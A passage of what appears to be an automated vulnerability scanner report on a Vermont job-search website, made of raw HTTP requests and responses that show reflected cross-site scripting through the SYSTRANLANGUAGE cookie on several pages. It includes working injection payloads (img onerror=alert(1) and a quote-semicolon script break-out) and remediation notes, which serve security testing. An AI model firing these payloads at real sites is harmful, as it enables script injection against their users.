HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:42 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN2B6C6";ALERT(1)//2BB717DA338\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81040"><img%20src%3da%20onerror%3dalert(1)>b72e0d73415 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 81040"><img src=a onerror=alert(1)>b72e0d73415 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/works/joboverview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en81040"><img%20src%3da%20onerror%3dalert(1)>b72e0d73415; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:41 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en81040"><img src=a onerror=alert(1)>b72e0d73415"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f340"%3balert(1)//e611409b0e4 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 2f340";alert(1)//e611409b0e4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/works/joboverview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en2f340"%3balert(1)//e611409b0e4; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:45 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN2F340";ALERT(1)//E611409B0E4\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3d5b"><img%20src%3da%20onerror%3dalert(1)>18601d5f451 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as d3d5b"><img src=a onerror=alert(1)>18601d5f451 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/works/jobsearch.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=end3d5b"><img%20src%3da%20onerror%3dalert(1)>18601d5f451; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:37 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="end3d5b"><img src=a onerror=alert(1)>18601d5f451"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a6d8"%3balert(1)//ce7bba5ab0e was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 9a6d8";alert(1)//ce7bba5ab0e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/works/jobsearch.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en9a6d8"%3balert(1)//ce7bba5ab0e; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:40 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN9A6D8";ALERT(1)//CE7BBA5AB0E\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd58c"%3balert(1)//1a305bee659 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as cd58c";alert(1)//1a305bee659 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/works/linkview.cfm?set=JSR HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=encd58c"%3balert(1)//1a305bee659; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENCD58C";ALERT(1)//1A305BEE659\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0e85"><img%20src%3da%20onerror%3dalert(1)>5e8abc94283 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as c0e85"><img src=a onerror=alert(1)>5e8abc94283 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/works/linkview.cfm?set=JSR HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=enc0e85"><img%20src%3da%20onerror%3dalert(1)>5e8abc94283; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:45 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enc0e85"><img src=a onerror=alert(1)>5e8abc94283"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 547b0"%3balert(1)//a5d8ef8c477 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 547b0";alert(1)//a5d8ef8c477 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/works/resourcesoverview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en547b0"%3balert(1)//a5d8ef8c477; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN547B0";ALERT(1)//A5D8EF8C477\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14e61"><img%20src%3da%20onerror%3dalert(1)>6a2d11c994c was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 14e61"><img src=a onerror=alert(1)>6a2d11c994c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/works/resourcesoverview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en14e61"><img%20src%3da%20onerror%3dalert(1)>6a2d11c994c; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:48 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en14e61"><img src=a onerror=alert(1)>6a2d11c994c"> ...[SNIP]...
